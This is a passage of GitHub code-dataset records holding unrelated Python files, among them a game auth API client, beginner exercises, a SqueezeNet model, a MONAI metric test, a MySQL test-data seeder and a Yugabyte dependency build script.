'HziAuthDev')\n if uid in system.playerAuthData:\n return system.playerAuthData[uid]['code'] != 0\n else:\n return False\n\n def IsPlayerBindPhoneNewest(self, uid, cb):\n url = self.apiHost + '/check_player'\n header = {'Content-Type': 'application/json'}\n data = json.dumps({'uid': uid})\n def callback(code, result, header):\n if code == 200:\n result = json.loads(result, encoding='utf-8')\n cb(result['code'] != 0)\n else:\n cb(None)\n serverhttp.HttpPool().Request('POST', url, header, data, callback)\n\n @staticmethod\n def GetPlayerBanData(uid):\n system = serverApi.GetSystem('HziAuth', 'HziAuthDev')\n if uid in system.playerAuthData:\n return system.playerAuthData[uid]['banData']\n else:\n return False\n\n def GetPlayerBanDataNewest(self, uid, cb):\n url = self.apiHost + '/check_player'\n header = {'Content-Type': 'application/json'}\n data = json.dumps({'uid': uid})\n def callback(code, result, header):\n if code == 200:\n result = json.loads(result, encoding='utf-8')\n if 'ban_data' in result:\n cb(dict(json.loads(result['ban_data'].encode('utf-8'))))\n else:\n cb({})\n else:\n cb(False)\n serverhttp.HttpPool().Request('POST', url, header, data, callback)\n\n def BanPlayer(self, uid, level, cb):\n url = self.apiHost + '/ban'\n header = {'Content-Type': 'application/json'}\n data = json.dumps({'uid': uid, 'level': level})\n def callback(code, result, header):\n if code == 200:\n result = json.loads(result, encoding='utf-8')\n cb(result)\n else:\n cb(False)\n serverhttp.HttpPool().Request('POST', url, header, data, 
callback)\n","repo_name":"NullYu/icegame-dev","sub_path":"hziAuth/developer_mods/hziAuthDev/hziAuthScript/hziAuthApi.py","file_name":"hziAuthApi.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1459600655","text":"''' Write a Python program to create a dictionary of\n Hindi words with their English translations as values,\n and provide the user with an option to look a word up '''\n \nmyDict = {\n "Pankha": "Fan",\n "Dabba": "Box",\n "Vastu": "Item",\n "Kitab": "Book",\n "Insaan": "Human",\n "Ladka": "Boy"\n}\nprint("The options are:\\n ", myDict.keys())\na = input("Enter the Hindi word you want to translate: ")\nprint("The meaning of your entered word is: ", myDict.get(a))","repo_name":"Deepesh-Patel/Python-Programs","sub_path":"Dictionary & Sets/03_hindi-english_translation.py","file_name":"03_hindi-english_translation.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74162670888","text":"\"\"\"\nCreate child processes to invoke other programs\n\nVersion: 0.1\nAuthor: 骆昊\nDate: 2018-03-20\n\"\"\"\n\nimport subprocess\nimport sys\n\ndef main():\n # Get the command line arguments via sys.argv\n if len(sys.argv) > 1:\n # The first command line argument is the program itself, so start from the second\n for index in range(1, len(sys.argv)):\n try:\n # Start a child process via the call function of the subprocess module\n status = subprocess.call(sys.argv[index])\n except FileNotFoundError:\n print('Cannot execute the command %s' % sys.argv[index])\n else:\n print('Please specify the processes to execute via command line arguments')\n\n\nif __name__ == '__main__':\n main()\n
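\n# Example invocation (program names below are illustrative, not from the original):\n# python multiprocess3.py notepad.exe calc.exe\n# Each argument is launched in its own child process via subprocess.call.\n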
","repo_name":"jackfrued/Python-100-Days","sub_path":"Day01-15/code/Day13/multiprocess3.py","file_name":"multiprocess3.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"zh","doc_type":"code","stars":142367,"dataset":"github-code","pt":"53"}
+{"seq_id":"70368226728","text":"\"\"\"\r\nYou are given an array arr of n elements. In one operation you can pick two indices i and j, such that arr[i] >= arr[j] and replace the value of arr[i] with (arr[i] - arr[j]). You have to minimize the values of the array after performing any number of such operations.\r\n\r\nExample 1:\r\n\r\nInput:\r\nn = 3\r\narr = {3,2,4}\r\nOutput:\r\n1\r\nExplanation:\r\n1st Operation : We can pick 4 & 3, subtract 4-3 => {3,2,1}\r\n2nd Operation : We can pick 3 & 2, subtract 3-2 => {1,2,1}\r\n3rd Operation : We can pick 1 & 2, subtract 2-1 => {1,1,1}\r\n4th Operation : We can pick 1 & 1, subtract 1-1 => {1,0,1}\r\n5th Operation : We can pick 1 & 1, subtract 1-1 => {0,0,1}\r\nAfter this no operation can be performed, so the maximum number left in the array is 1, so the answer is 1.\r\nExample 2:\r\n\r\nInput:\r\nn = 2\r\narr = {2,4}\r\nOutput:\r\n2\r\nExplanation:\r\n1st Operation : We can pick 4 & 2, subtract 4-2 => {2,2}\r\n2nd Operation : We can pick 2 & 2, subtract 2-2 => {0,2}\r\nAfter this no operation can be performed, so the maximum number left in the array is 2, so the answer is 2.\r\n\"\"\"\r\n\r\n# My solution: -\r\nclass Solution:\r\n def minimumNumber(self, n, arr):\r\n while max(arr) != min(arr):\r\n max_index = arr.index(max(arr))\r\n min_index = arr.index(min(arr))\r\n arr[max_index] = arr[max_index] - arr[min_index]\r\n return max(arr)\r\n\r\n# Note: the loop above assumes all elements are positive; a zero minimum would\r\n# never change max(arr) and the loop would not terminate.\r\n\r\n# Testing\r\nsol = Solution()\r\n\r\n# Test Case 1\r\nn1 = 3\r\narr1 = [3, 2, 4]\r\nprint(sol.minimumNumber(n1, arr1)) # Output: 1\r\n\r\n# Test Case 2\r\nn2 = 2\r\narr2 = [2, 4]\r\nprint(sol.minimumNumber(n2, arr2)) # Output: 2\r\n\r\n# Another interesting solution I found: -\r\n# This solution also reduces the time complexity ;)\r\n\r\nfrom math import gcd\r\n\r\nclass Solution1:\r\n def minimumNumber1(self, n, arr):\r\n result = arr[0]\r\n for i in range(1, n):\r\n result = gcd(result, arr[i])\r\n return result\r\n\r\n# Create an instance of the Solution class\r\nsolu = Solution1()\r\n\r\n# Test Case 1\r\nn3 = 3\r\narr3 = [3, 2, 4]\r\nprint(solu.minimumNumber1(n3, arr3)) # Output: 1\r\n\r\n# Test Case 2\r\nn4 = 2\r\narr4 = [2, 4]\r\nprint(solu.minimumNumber1(n4, arr4)) # Output: 2\r\n
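\r\n# Why the gcd approach works: replacing arr[i] with arr[i] - arr[j] never changes\r\n# the gcd of the array (this is exactly Euclid's algorithm), and repeated\r\n# subtraction can drive every element down to gcd(arr), so the smallest\r\n# achievable maximum is the gcd of all elements.\r\n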
\r\n","repo_name":"Siddharth1047/code-till-job","sub_path":"Day-12.py","file_name":"Day-12.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"35066838627","text":"# Author: Omkar Dixit\n# Email: omedxt@gmail.com\n\n# Link: https://leetcode.com/problems/find-median-from-data-stream/\n\n# Time Complexity: O(logn)\n\nimport heapq\n\nclass MedianFinder(object):\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.leftSide = [] # Max Heap\n self.rightSide = [] # Min Heap\n \n def addNum(self, num):\n \"\"\"\n :type num: int\n :rtype: None\n \"\"\"\n # heapq is a min-heap, so the lower half is stored negated to act as a\n # max-heap; the push/pop sequence keeps len(leftSide) >= len(rightSide).\n heapq.heappush(self.leftSide, -num)\n heapq.heappush(self.rightSide, -heapq.heappop(self.leftSide))\n if len(self.leftSide) < len(self.rightSide):\n heapq.heappush(self.leftSide, -heapq.heappop(self.rightSide))\n\n def findMedian(self):\n \"\"\"\n :rtype: float\n \"\"\"\n if len(self.leftSide) == len(self.rightSide):\n return (-self.leftSide[0] + self.rightSide[0]) / 2.0\n else:\n return -self.leftSide[0]\n \n\n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()","repo_name":"dixitomkar1809/Coding-Python","sub_path":"LeetCode/medianOfDataStream.py","file_name":"medianOfDataStream.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20747274573","text":"import os\nfrom pathlib import Path\nimport sys\n\nclass Installer:\n\n def __init__(self):\n self.to_install = []\n self.userdir = None\n self.filesystems = []\n\nexecutable = Path(sys.executable)\nenvdir = executable.parent.parent\nmambadir = envdir.parent.parent\n\n\n","repo_name":"scottcanoe/sandbox","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15668156453","text":"# _*_ coding:utf-8 _*_\nfrom pymysql import connect\nimport yaml\nfrom loguru import logger\nimport os\n\n\nclass DB(object):\n\n def __init__(self):\n \"\"\"Connect to the database\"\"\"\n path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'test_project', 'data', 'datas.yaml')\n with (open(path, 'r', encoding='utf8')) as f:\n self.data = yaml.load(f, Loader=yaml.FullLoader)\n logger.info(self.data)\n logger.info('Connecting to the database.......')\n self.conn = connect(host=self.data['database']['host'], user=self.data['database']['username'],\n password=self.data['database']['password'], db=self.data['database']['name'])\n self.cursor = self.conn.cursor()\n\n def run_api_uesr(self):\n self.clear(self.data['database1'])\n logger.info('Inserting data into the api_user table........')\n global sql\n for i in range(len(self.data['data1'])):\n tabel_name = self.data['database1']\n id = self.data['data1'][i]['id']\n username = self.data['data1'][i]['username']\n email = self.data['data1'][i]['email']\n groups = self.data['data1'][i]['groups']\n sql = f\"\"\"INSERT INTO {tabel_name}(id,username, email, `groups`) VALUES ({id}, '{username}', '{email}', '{groups}')\"\"\"\n self.insert(sql)\n\n def run_api_group(self):\n self.clear(self.data['database2'])\n logger.info('Inserting data into the api_group table........')\n global sql\n for i in range(len(self.data['data1'])):\n tabel_name = self.data['database2']\n id = self.data['data2'][i]['id']\n name = self.data['data2'][i]['name']\n sql = f\"\"\"INSERT INTO {tabel_name}(id,name) VALUES ({id}, '{name}')\"\"\"\n self.insert(sql)\n\n def clear(self, table_name):\n \"\"\"Clear the data in the table\"\"\"\n clear_sql = 'truncate ' + table_name + ';'\n self.cursor.execute('set foreign_key_checks=0;')\n self.cursor.execute(clear_sql)\n self.conn.commit()\n\n def insert(self, sql):\n \"\"\"Insert data\"\"\"\n try:\n # Execute the SQL statement\n self.cursor.execute(sql)\n # Commit to the database\n self.conn.commit()\n except:\n # Roll back if an error occurs\n self.conn.rollback()\n\n def close(self):\n \"\"\"Close the database connection\"\"\"\n logger.info('Closing the database.......')\n self.conn.close()\n\n def init_data(self):\n logger.info('Initializing data.........')\n self.run_api_group()\n self.run_api_uesr()\n self.close()\n\n\nif __name__ == '__main__':\n db = DB()\n db.init_data()\n","repo_name":"liuchangfu/django_restful","sub_path":"api/test_project/mysql_action.py","file_name":"mysql_action.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41670320525","text":"import argparse\nimport sys\nfrom Bio import SeqIO\nimport numpy as np\n\ndef length_stat(path, type):\n length = []\n if type == 'fastq':\n errors = [] # expected wrong bases in each read\n with open(path) as f:\n records = SeqIO.parse(f, type)\n for record in records:\n length.append(len(record.seq))\n if type == 'fastq':\n
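 # Phred quality Q encodes the base-call error probability p via\n # Q = -10*log10(p), i.e. p = 10**(-Q/10); read length times mean(p) below\n # gives the expected number of erroneous bases in the read.\n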
 q = np.array(record.letter_annotations[\"phred_quality\"])\n pe = 10**(-0.1 * q)\n errors.append(length[-1] * np.mean(pe))\n\n length = np.array(length)\n count = len(length)\n max_len = np.max(length)\n min_len = np.min(length)\n mean = np.mean(length)\n median = np.median(length)\n total = np.sum(length)\n if type == 'fastq':\n error_base = np.sum(errors)\n print(\"There are {} reads\".format(count))\n print(\"In total, there are {} bases\".format(total))\n print(\"The mean of reads is {}\".format(mean))\n print(\"The median of reads is {}\".format(median))\n print(\"The longest length is {} and the shortest length is {}\".format(max_len, min_len))\n if type == 'fastq':\n print('Total expected errors: {}'.format(error_base))\n print('Estimated error rate: {}'.format(error_base/total))\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input\", help=\"path of input file\", type=str)\n parser.add_argument('--type', type=str, default='fasta', help='type of input \"fasta\" or \"fastq\"')\n\n try:\n args = parser.parse_args()\n\n except SystemExit:\n # argparse exits on bad arguments; show the full help before exiting\n parser.print_help()\n sys.exit(1)\n\n length_stat(args.input, args.type)\n\n\n","repo_name":"Strideradu/SeqAnaScript","sub_path":"SeqLengthStat.py","file_name":"SeqLengthStat.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5375643582","text":"import tensorflow as tf\nimport numpy as np\nimport sys\nimport skimage\nimport skimage.io\nimport skimage.transform\n\n# Parameters\nlearning_rate = 0.01\ntraining_epochs = 25\nbatch_size = 100\ndisplay_step = 1\n\n\nclass SqueezeNet(object):\n def __init__(self, nb_classes=2, is_training=True):\n # conv1\n self.X_batch = tf.placeholder(tf.float32,shape=[None,224,224,3])\n self.Y_batch = tf.placeholder(tf.float32,shape=[None, 2])\n\n net = tf.layers.conv2d(self.X_batch, 96, [7, 7], strides=[2, 2],\n padding=\"SAME\", activation=tf.nn.relu,\n name=\"conv1\")\n # maxpool1\n net = tf.layers.max_pooling2d(net, [3, 3], strides=[2, 2],\n name=\"maxpool1\")\n # fire2\n net = self._fire(net, 16, 64, \"fire2\")\n # fire3\n net = self._fire(net, 16, 64, \"fire3\")\n # fire4\n net = self._fire(net, 32, 128, \"fire4\")\n # maxpool4\n net = tf.layers.max_pooling2d(net, [3, 3], strides=[2, 2],\n name=\"maxpool4\")\n # fire5\n net = self._fire(net, 32, 128, \"fire5\")\n # fire6\n net = self._fire(net, 48, 192, \"fire6\")\n # fire7\n net = self._fire(net, 48, 192, \"fire7\")\n # fire8\n net = self._fire(net, 64, 256, \"fire8\")\n # maxpool8\n net = tf.layers.max_pooling2d(net, [3, 3], strides=[2, 2],\n name=\"maxpool8\")\n # fire9\n net = self._fire(net, 64, 256, \"fire9\")\n # dropout\n net = tf.layers.dropout(net, 0.5, training=is_training)\n # conv10\n # CURRENTLY 2 CLASS\n net = tf.layers.conv2d(net, 2, [1, 1], strides=[1, 1],\n padding=\"SAME\", activation=tf.nn.relu,\n name=\"conv10\")\n # avgpool10\n net = tf.layers.average_pooling2d(net, [13, 13], strides=[1, 1],\n name=\"avgpool10\")\n # squeeze the axis\n net = tf.squeeze(net, axis=[1, 2])\n\n self.logits = net\n self.prediction = tf.nn.softmax(net)\n\n self.losses = tf.losses.softmax_cross_entropy(onehot_labels=self.Y_batch,logits=self.logits)\n self.train = tf.train.GradientDescentOptimizer(0.1).minimize(self.losses)\n\n\n def _fire(self, inputs, squeeze_depth, expand_depth, scope):\n with tf.variable_scope(scope):\n squeeze = tf.layers.conv2d(inputs, squeeze_depth, [1, 1],\n strides=[1, 1], padding=\"SAME\",\n activation=tf.nn.relu, name=\"squeeze\")\n # expand: 1x1 and 3x3 branches, concatenated below\n expand_1x1 = tf.layers.conv2d(squeeze, expand_depth, [1, 1],\n strides=[1, 1], padding=\"SAME\",\n activation=tf.nn.relu, name=\"expand_1x1\")\n expand_3x3 = tf.layers.conv2d(squeeze, expand_depth, [3, 3],\n strides=[1, 
1], padding=\"SAME\",\n activation=tf.nn.relu, name=\"expand_3x3\")\n return tf.concat([expand_1x1, expand_3x3], axis=3)\n\n\n\ndef load_image(path):\n # load image\n img = skimage.io.imread(path)\n img = img / 255.0\n # assert (0 <= img).all() and (img <= 1.0).all()\n # print \"Original Image Shape: \", img.shape\n # we crop image from center\n short_edge = min(img.shape[:2])\n yy = int((img.shape[0] - short_edge) / 2)\n xx = int((img.shape[1] - short_edge) / 2)\n crop_img = img[yy: yy + short_edge, xx: xx + short_edge]\n # resize to 224, 224\n resized_img = skimage.transform.resize(crop_img, (224, 224))\n return resized_img\n\n\nif __name__ == \"__main__\":\n path = sys.path[0]\n img1 = load_image(path+\"/dog.jpg\")*255.0\n img2 = load_image(path+\"/cat.jpg\")*255.0\n batch1 = img1.reshape((1, 224, 224, 3))\n batch2 = img2.reshape((1, 224, 224, 3))\n x = np.concatenate((batch1, batch2), 0)\n y = np.array([[1, 0],[0, 1]], dtype=np.int64)\n with tf.Graph().as_default():\n with tf.Session() as sess:\n # The constructor takes no input tensor; images are fed via X_batch.\n # Rebinding the class name here would also shadow SqueezeNet itself.\n model = SqueezeNet()\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n _, loss = sess.run([model.train, model.losses], feed_dict={model.X_batch: x, model.Y_batch: y})\n\n saver.save(sess, \"saved_model/model-32\")\n tf.summary.FileWriter(\"saved_model\", sess.graph)\n print(loss)\n","repo_name":"AprilYoungs/Computer-Vision","sub_path":"networks/SqueezeNet/SqueezeNet_Image.py","file_name":"SqueezeNet_Image.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8959651573","text":"import unittest\nfrom typing import Tuple\n\nimport numpy as np\nfrom parameterized import parameterized\n\nfrom monai.metrics import compute_average_surface_distance\n\n\ndef create_spherical_seg_3d(\n radius: float = 20.0,\n centre: Tuple[int, int, int] = (49, 49, 49),\n labelfield_value: int = 1,\n background_value: int = 0,\n im_shape: Tuple[int, int, int] = (99, 99, 99),\n) -> np.ndarray:\n \"\"\"\n Return a 3D image with a sphere inside. 
Voxel values will be\n `labelfield_value` inside the sphere, and `background_value` elsewhere.\n\n Args:\n radius: radius of sphere (in terms of number of voxels, can be partial)\n centre: location of sphere centre.\n labelfield_value: index of labelfield.\n background_value: index of background.\n im_shape: shape of image to create\n\n See also:\n :py:meth:`~create_test_image_3d`\n \"\"\"\n # Create image\n image = np.zeros(im_shape, dtype=np.int32)\n spy, spx, spz = np.ogrid[\n -centre[0] : im_shape[0] - centre[0], -centre[1] : im_shape[1] - centre[1], -centre[2] : im_shape[2] - centre[2]\n ]\n circle = (spx * spx + spy * spy + spz * spz) <= radius * radius\n\n image[circle] = labelfield_value\n image[~circle] = background_value\n return image\n\n\nTEST_CASES = [\n [\n [create_spherical_seg_3d(), create_spherical_seg_3d(), 1],\n [0, 0],\n ],\n [\n [\n create_spherical_seg_3d(radius=20, centre=(20, 20, 20)),\n create_spherical_seg_3d(radius=20, centre=(19, 19, 19)),\n 1,\n \"taxicab\",\n ],\n [1.0380029806259314, 1.0380029806259314],\n ],\n [\n [\n create_spherical_seg_3d(radius=33, labelfield_value=2, centre=(19, 33, 22)),\n create_spherical_seg_3d(radius=33, labelfield_value=2, centre=(20, 33, 22)),\n 2,\n ],\n [0.35021200688332677, 0.3483278807706289],\n ],\n [\n [\n create_spherical_seg_3d(radius=20, centre=(20, 33, 22)),\n create_spherical_seg_3d(radius=40, centre=(20, 33, 22)),\n 1,\n ],\n [13.975673696300824, 12.040033513150455],\n ],\n [\n [\n create_spherical_seg_3d(radius=20, centre=(20, 33, 22)),\n create_spherical_seg_3d(radius=40, centre=(20, 33, 22)),\n 1,\n \"chessboard\",\n ],\n [10.792254295459173, 9.605067064083457],\n ],\n [\n [\n create_spherical_seg_3d(radius=20, centre=(20, 33, 22)),\n create_spherical_seg_3d(radius=40, centre=(20, 33, 22)),\n 1,\n \"taxicab\",\n ],\n [17.32691760951026, 12.432687531048186],\n ],\n [\n [\n np.zeros([99, 99, 99]),\n create_spherical_seg_3d(radius=40, centre=(20, 33, 22)),\n 1,\n ],\n [np.inf, np.inf],\n ],\n [\n [\n np.zeros([99, 99, 99]),\n np.zeros([99, 99, 99]),\n 1,\n ],\n [np.inf, np.inf],\n ],\n [\n [\n create_spherical_seg_3d(),\n np.zeros([99, 99, 99]),\n 1,\n \"taxicab\",\n ],\n [np.inf, np.inf],\n ],\n]\n\n\nclass TestAllSurfaceMetrics(unittest.TestCase):\n @parameterized.expand(TEST_CASES)\n def test_value(self, input_data, expected_value):\n if len(input_data) == 4:\n [seg_1, seg_2, label_idx, metric] = input_data\n else:\n [seg_1, seg_2, label_idx] = input_data\n metric = \"euclidean\"\n ct = 0\n for symmetric in [True, False]:\n expected_value_curr = expected_value[ct]\n result = compute_average_surface_distance(\n seg_1, seg_2, label_idx, symmetric=symmetric, distance_metric=metric\n )\n np.testing.assert_allclose(expected_value_curr, result, rtol=1e-7)\n ct += 1\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"precision-medicine-um/MONAI-Deep_Learning","sub_path":"tests/test_surface_distance.py","file_name":"test_surface_distance.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12006270250","text":"import argparse\nimport hashlib\nimport json\nimport os\nimport platform\nimport subprocess\nimport stat\nimport time\nimport re\n\nfrom re import Pattern\n\nfrom typing import Optional, List, Set, Tuple, Dict, Any, Callable, cast\n\nfrom sys_detection import is_macos, is_linux\nfrom pathlib import Path\n\nfrom build_definitions import (\n BuildGroup,\n BuildType,\n get_build_def_module,\n 
get_deps_from_module_names,\n)\n\nfrom build_definitions.tcmalloc import TCMallocDependency\n\nfrom yugabyte_db_thirdparty.builder_helpers import (\n format_cmake_args_for_log,\n get_make_parallelism,\n get_rpath_flag,\n log_and_set_env_var_to_list,\n PLACEHOLDER_RPATH,\n)\nfrom yugabyte_db_thirdparty.builder_helpers import is_ninja_available\nfrom yugabyte_db_thirdparty.builder_interface import BuilderInterface\nfrom yugabyte_db_thirdparty.cmd_line_args import parse_cmd_line_args\nfrom yugabyte_db_thirdparty.compiler_choice import CompilerChoice\nfrom yugabyte_db_thirdparty.custom_logging import (\n colored_log,\n fatal,\n heading,\n log,\n log_output_internal,\n SEPARATOR,\n YELLOW_COLOR,\n)\nfrom yugabyte_db_thirdparty.dependency import Dependency\nfrom yugabyte_db_thirdparty.devtoolset import activate_devtoolset\nfrom yugabyte_db_thirdparty.download_manager import DownloadManager\nfrom yugabyte_db_thirdparty.env_helpers import write_env_vars\nfrom yugabyte_db_thirdparty.string_util import indent_lines\nfrom yugabyte_db_thirdparty.arch import (\n get_arch_switch_cmd_prefix,\n get_target_arch,\n get_other_macos_arch,\n add_homebrew_to_path,\n)\nfrom yugabyte_db_thirdparty import util\nfrom yugabyte_db_thirdparty.util import (\n assert_dir_exists,\n assert_list_contains,\n EnvVarContext,\n PushDir,\n read_file,\n remove_path,\n YB_THIRDPARTY_DIR,\n add_path_entry,\n shlex_join,\n)\nfrom yugabyte_db_thirdparty.file_system_layout import FileSystemLayout\nfrom yugabyte_db_thirdparty import file_system_layout\nfrom yugabyte_db_thirdparty.toolchain import Toolchain, ensure_toolchains_installed\nfrom yugabyte_db_thirdparty.clang_util import (\n get_clang_library_dir,\n get_clang_include_dir,\n create_llvm_tool_dir,\n)\nfrom yugabyte_db_thirdparty.macos import get_min_supported_macos_version\nfrom yugabyte_db_thirdparty.linuxbrew import get_linuxbrew_dir, using_linuxbrew, set_linuxbrew_dir\nfrom yugabyte_db_thirdparty.constants import (\n COMPILER_WRAPPER_ENV_VAR_NAME_LD_FLAGS_TO_APPEND,\n COMPILER_WRAPPER_ENV_VAR_NAME_LD_FLAGS_TO_REMOVE,\n)\nfrom yugabyte_db_thirdparty import (\n compile_commands,\n constants,\n git_util,\n)\n\n# -------------------------------------------------------------------------------------------------\n\nASAN_COMPILER_FLAGS = [\n '-fsanitize=address',\n '-fsanitize=undefined',\n '-DADDRESS_SANITIZER',\n]\n\nASAN_LD_FLAGS = [\n '-Wl,--allow-shlib-undefined',\n '-Wl,--unresolved-symbols=ignore-all'\n]\n\nTSAN_COMPILER_FLAGS = [\n '-fsanitize=thread',\n '-DTHREAD_SANITIZER',\n]\n\n# https://github.com/aws/aws-graviton-getting-started/blob/main/c-c++.md\nGRAVITON_COMPILER_FLAGS = [\n '-march=armv8.2-a+fp16+rcpc+dotprod+crypto',\n '-mtune=neoverse-n1',\n '-mno-outline-atomics',\n]\n\n# We create a file named like this in each dependency's build directory, with all the relevant\n# environment variables that we set.\nDEPENDENCY_ENV_FILE_NAME = 'yb_dependency_env.sh'\n\n# If this pattern appears, we should use the CPPFLAGS environment variable for this dependency\nDISALLOWED_CONFIGURE_OUTPUT_RE = re.compile(\n '(C|CXX)FLAGS should only be used to specify C compiler flags, not include directories[.]')\n\n\ndef extend_lists(lists: List[List[str]], to_add: List[str]) -> None:\n for list_to_extend in lists:\n list_to_extend.extend(to_add.copy())\n\n\nclass Builder(BuilderInterface):\n args: argparse.Namespace\n\n # TODO: move flag management out from here into a separate class.\n\n # Linker flags.\n ld_flags: List[str]\n\n assembler_flags: List[str]\n\n executable_only_ld_flags: 
List[str]\n\n # These flags apply to both C and C++ compilers. Do not add preprocessor flags (e.g. include\n # directories, system include directories, etc.) here.\n compiler_flags: List[str]\n\n # Based on the dependency, we either set CPPFLAGS based on this, or add them to CFLAGS/CXXFLAGS.\n # For CMake dependencies, we always add them to compiler flags.\n preprocessor_flags: List[str]\n\n # Flags specific for C and C++ compilers.\n c_flags: List[str]\n cxx_flags: List[str]\n\n libs: List[str]\n additional_allowed_shared_lib_paths: Set[str]\n download_manager: DownloadManager\n compiler_choice: CompilerChoice\n fs_layout: FileSystemLayout\n fossa_deps: List[Any]\n toolchain: Optional[Toolchain]\n remote_build: bool\n\n dependencies: List[Dependency]\n dependencies_by_name: Dict[str, Dependency]\n\n lto_type: Optional[str]\n selected_dependencies: List[Dependency]\n\n # Mapping from e.g. com_google_tcmalloc or com_google_absl to the corresponding build\n # directories.\n bazel_path_mapping: Dict[str, str]\n\n \"\"\"\n This class manages the overall process of building third-party dependencies, including the set\n of dependencies to build, build types, and the directories to install dependencies.\n \"\"\"\n def __init__(self) -> None:\n self.linuxbrew_dir = None\n self.additional_allowed_shared_lib_paths = set()\n\n self.toolchain = None\n self.fossa_deps = []\n self.lto_type = None\n\n self.dependencies = []\n self.dependencies_by_name = {}\n\n def install_toolchains(self) -> None:\n toolchains = ensure_toolchains_installed(\n self.download_manager, self.args.toolchain.split('_'))\n\n # We expect at most one Linuxbrew toolchain to be specified (handled by set_linuxbrew_dir).\n for toolchain in toolchains:\n if toolchain.toolchain_type == 'linuxbrew':\n set_linuxbrew_dir(toolchain.toolchain_root)\n\n if len(toolchains) == 1:\n self.toolchain = toolchains[0]\n return\n if len(toolchains) != 2:\n raise ValueError(\"Unsupported combination of toolchains: %s\" % self.args.toolchain)\n if not toolchains[0].toolchain_type.startswith('llvm'):\n raise ValueError(\n \"For a combination of toolchains, the first one must be an LLVM one, got: %s\" %\n toolchains[0].toolchain_type)\n self.toolchain = toolchains[0]\n if toolchains[1].toolchain_type != 'linuxbrew':\n raise ValueError(\n \"For a combination of toolchains, the second one must be Linuxbrew, got: %s\" %\n toolchains[1].toolchain_type)\n\n def determine_compiler_family_and_prefix(self) -> Tuple[str, Optional[str]]:\n compiler_family: Optional[str] = None\n compiler_prefix: Optional[str] = None\n if self.args.toolchain:\n self.install_toolchains()\n assert self.toolchain is not None # install_toolchains guarantees this.\n compiler_prefix = self.toolchain.toolchain_root\n self.toolchain.write_url_and_path_files()\n if self.args.toolchain.startswith('llvm'):\n compiler_family = 'clang'\n elif self.args.devtoolset:\n compiler_family = 'gcc'\n elif self.args.compiler_prefix:\n compiler_prefix = self.args.compiler_prefix\n\n if is_macos():\n if compiler_family is None:\n compiler_family = 'clang'\n elif compiler_family != 'clang':\n raise ValueError(\"Only clang compiler family is supported on macOS\")\n\n if self.args.compiler_family is not None:\n if compiler_family is None:\n compiler_family = self.args.compiler_family\n elif compiler_family != self.args.compiler_family:\n raise ValueError(\"Compiler type specified on the command line is %s, \"\n \"but automatically determined as %s\" % (self.args.compiler_family,\n compiler_family))\n\n if 
compiler_family is None:\n raise ValueError(\n \"Could not determine compiler family. Use --compiler-family to disambiguate.\")\n return compiler_family, compiler_prefix\n\n def parse_args(self) -> None:\n self.args = parse_cmd_line_args()\n\n self.remote_build = self.args.remote_build_server and self.args.remote_build_dir\n if self.remote_build:\n return\n\n if self.args.make_parallelism:\n os.environ['YB_MAKE_PARALLELISM'] = str(self.args.make_parallelism)\n\n self.fs_layout = FileSystemLayout()\n\n if self.args.dev_repo:\n for dev_repo_mapping in self.args.dev_repo:\n self.fs_layout.add_dev_repo_mapping(dev_repo_mapping)\n\n self.download_manager = DownloadManager(\n should_add_checksum=self.args.add_checksum,\n download_dir=self.fs_layout.tp_download_dir)\n\n compiler_family, compiler_prefix = self.determine_compiler_family_and_prefix()\n\n if self.args.devtoolset is not None:\n activate_devtoolset(self.args.devtoolset)\n self.compiler_choice = CompilerChoice(\n compiler_family=compiler_family,\n compiler_prefix=compiler_prefix,\n compiler_suffix=self.args.compiler_suffix,\n devtoolset=self.args.devtoolset,\n use_ccache=self.args.use_ccache,\n expected_major_compiler_version=self.args.expected_major_compiler_version\n )\n\n llvm_major_version: Optional[int] = self.compiler_choice.get_llvm_major_version()\n if llvm_major_version:\n if using_linuxbrew():\n log(\"Automatically enabling compiler wrapper for a Clang Linuxbrew-targeting build\")\n log(\"Disallowing the use of headers in /usr/include\")\n os.environ['YB_DISALLOWED_INCLUDE_DIRS'] = '/usr/include'\n self.args.use_compiler_wrapper = True\n if llvm_major_version >= 13:\n log(\"Automatically enabling compiler wrapper for Clang major version 13 or higher\")\n self.args.use_compiler_wrapper = True\n\n self.lto_type = self.args.lto\n\n def finish_initialization(self) -> None:\n self.fs_layout.finish_initialization(\n per_build_subdirs=(\n True if self.args.per_build_dirs else\n (False if self.args.no_per_build_dirs else None)\n ),\n compiler_choice=self.compiler_choice,\n lto_type=self.args.lto)\n self.populate_dependencies()\n self.select_dependencies_to_build()\n self.compiler_choice.set_compiler(use_compiler_wrapper=False)\n\n def populate_dependencies(self) -> None:\n # We have to use get_build_def_module to access submodules of build_definitions,\n # otherwise MyPy gets confused.\n\n self.dependencies = 